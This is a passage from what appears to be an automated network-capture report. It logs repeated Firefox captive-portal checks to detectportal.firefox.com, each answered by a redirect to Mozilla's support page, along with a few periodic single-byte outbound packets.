                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:34.491622925 CET298INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                      Content-Length: 90
                                                                                                                                                                                                                                                                                      Via: 1.1 google
                                                                                                                                                                                                                                                                                      Date: Tue, 19 Nov 2024 10:32:23 GMT
                                                                                                                                                                                                                                                                                      Age: 84251
                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                      Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                      Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e
                                                                                                                                                                                                                                                                                      Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:34.594598055 CET303OUTGET /canonical.html HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:34.693176985 CET298INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                      Content-Length: 90
                                                                                                                                                                                                                                                                                      Via: 1.1 google
                                                                                                                                                                                                                                                                                      Date: Tue, 19 Nov 2024 10:32:23 GMT
                                                                                                                                                                                                                                                                                      Age: 84251
                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                      Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                      Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e
                                                                                                                                                                                                                                                                                      Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:34.753436089 CET303OUTGET /canonical.html HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:34.852368116 CET298INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                      Content-Length: 90
                                                                                                                                                                                                                                                                                      Via: 1.1 google
                                                                                                                                                                                                                                                                                      Date: Tue, 19 Nov 2024 10:32:23 GMT
                                                                                                                                                                                                                                                                                      Age: 84251
                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                      Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                      Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e
                                                                                                                                                                                                                                                                                      Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:35.255036116 CET303OUTGET /canonical.html HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:35.359021902 CET298INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                      Content-Length: 90
                                                                                                                                                                                                                                                                                      Via: 1.1 google
                                                                                                                                                                                                                                                                                      Date: Tue, 19 Nov 2024 10:32:23 GMT
                                                                                                                                                                                                                                                                                      Age: 84252
                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                      Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                      Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e
                                                                                                                                                                                                                                                                                      Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:35.758421898 CET303OUTGET /canonical.html HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:35.857033968 CET298INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                      Content-Length: 90
                                                                                                                                                                                                                                                                                      Via: 1.1 google
                                                                                                                                                                                                                                                                                      Date: Tue, 19 Nov 2024 10:32:23 GMT
                                                                                                                                                                                                                                                                                      Age: 84252
                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                      Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                      Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e
                                                                                                                                                                                                                                                                                      Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:40.012356043 CET303OUTGET /canonical.html HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:40.115622044 CET298INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                      Content-Length: 90
                                                                                                                                                                                                                                                                                      Via: 1.1 google
                                                                                                                                                                                                                                                                                      Date: Tue, 19 Nov 2024 10:32:23 GMT
                                                                                                                                                                                                                                                                                      Age: 84257
                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                      Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                      Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e
                                                                                                                                                                                                                                                                                      Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:50.197196007 CET6OUTData Raw: 00
                                                                                                                                                                                                                                                                                      Data Ascii:
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:50.623089075 CET303OUTGET /canonical.html HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:50.726350069 CET298INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                      Content-Length: 90
                                                                                                                                                                                                                                                                                      Via: 1.1 google
                                                                                                                                                                                                                                                                                      Date: Tue, 19 Nov 2024 10:32:23 GMT
                                                                                                                                                                                                                                                                                      Age: 84267
                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                      Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                      Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e
                                                                                                                                                                                                                                                                                      Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:57:00.572899103 CET303OUTGET /canonical.html HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:57:00.673064947 CET298INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                      Content-Length: 90
                                                                                                                                                                                                                                                                                      Via: 1.1 google
                                                                                                                                                                                                                                                                                      Date: Tue, 19 Nov 2024 10:32:23 GMT
                                                                                                                                                                                                                                                                                      Age: 84277
                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                      Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                      Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e
                                                                                                                                                                                                                                                                                      Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:57:01.115063906 CET303OUTGET /canonical.html HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:57:01.218204021 CET298INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                      Content-Length: 90
                                                                                                                                                                                                                                                                                      Via: 1.1 google
                                                                                                                                                                                                                                                                                      Date: Tue, 19 Nov 2024 10:32:23 GMT
                                                                                                                                                                                                                                                                                      Age: 84278
                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                      Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                      Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e
                                                                                                                                                                                                                                                                                      Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:57:02.576939106 CET303OUTGET /canonical.html HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:57:02.699378014 CET298INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                      Content-Length: 90
                                                                                                                                                                                                                                                                                      Via: 1.1 google
                                                                                                                                                                                                                                                                                      Date: Tue, 19 Nov 2024 10:32:23 GMT
                                                                                                                                                                                                                                                                                      Age: 84279
                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                      Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                      Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e
                                                                                                                                                                                                                                                                                      Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:57:11.750730038 CET303OUTGET /canonical.html HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:57:11.849169016 CET298INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                      Content-Length: 90
                                                                                                                                                                                                                                                                                      Via: 1.1 google
                                                                                                                                                                                                                                                                                      Date: Tue, 19 Nov 2024 10:32:23 GMT
                                                                                                                                                                                                                                                                                      Age: 84288
                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                      Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                      Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e
                                                                                                                                                                                                                                                                                      Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:57:21.907512903 CET6OUTData Raw: 00
                                                                                                                                                                                                                                                                                      Data Ascii:
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:57:31.159790039 CET303OUTGET /canonical.html HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:57:31.265364885 CET298INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                      Content-Length: 90
                                                                                                                                                                                                                                                                                      Via: 1.1 google
                                                                                                                                                                                                                                                                                      Date: Tue, 19 Nov 2024 10:32:23 GMT
                                                                                                                                                                                                                                                                                      Age: 84308
                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                      Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                      Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e
                                                                                                                                                                                                                                                                                      Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:57:31.629430056 CET303OUTGET /canonical.html HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:57:31.733089924 CET298INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                      Content-Length: 90
                                                                                                                                                                                                                                                                                      Via: 1.1 google
                                                                                                                                                                                                                                                                                      Date: Tue, 19 Nov 2024 10:32:23 GMT
                                                                                                                                                                                                                                                                                      Age: 84308
                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                      Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                      Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e
                                                                                                                                                                                                                                                                                      Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:57:41.806278944 CET6OUTData Raw: 00
                                                                                                                                                                                                                                                                                      Data Ascii:
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:57:51.901613951 CET6OUTData Raw: 00
                                                                                                                                                                                                                                                                                      Data Ascii:
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:57:52.245739937 CET303OUTGET /canonical.html HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:57:52.344324112 CET298INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                      Content-Length: 90
                                                                                                                                                                                                                                                                                      Via: 1.1 google
                                                                                                                                                                                                                                                                                      Date: Tue, 19 Nov 2024 10:32:23 GMT
                                                                                                                                                                                                                                                                                      Age: 84329
                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                      Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                      Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e
                                                                                                                                                                                                                                                                                      Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:58:02.411834002 CET6OUTData Raw: 00
                                                                                                                                                                                                                                                                                      Data Ascii:
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:58:12.496920109 CET6OUTData Raw: 00
                                                                                                                                                                                                                                                                                      Data Ascii:
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:58:22.596503973 CET6OUTData Raw: 00
                                                                                                                                                                                                                                                                                      Data Ascii:
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:58:32.613207102 CET6OUTData Raw: 00
                                                                                                                                                                                                                                                                                      Data Ascii:
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:58:42.710380077 CET6OUTData Raw: 00
                                                                                                                                                                                                                                                                                      Data Ascii:
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:58:52.807221889 CET6OUTData Raw: 00
                                                                                                                                                                                                                                                                                      Data Ascii:
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:59:13.299348116 CET303OUTGET /canonical.html HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:59:13.398128986 CET298INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                      Content-Length: 90
                                                                                                                                                                                                                                                                                      Via: 1.1 google
                                                                                                                                                                                                                                                                                      Date: Tue, 19 Nov 2024 10:32:23 GMT
                                                                                                                                                                                                                                                                                      Age: 84410
                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                      Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                      Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e
                                                                                                                                                                                                                                                                                      Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:59:32.710005999 CET303OUTGET /canonical.html HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:59:32.810476065 CET298INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                      Content-Length: 90
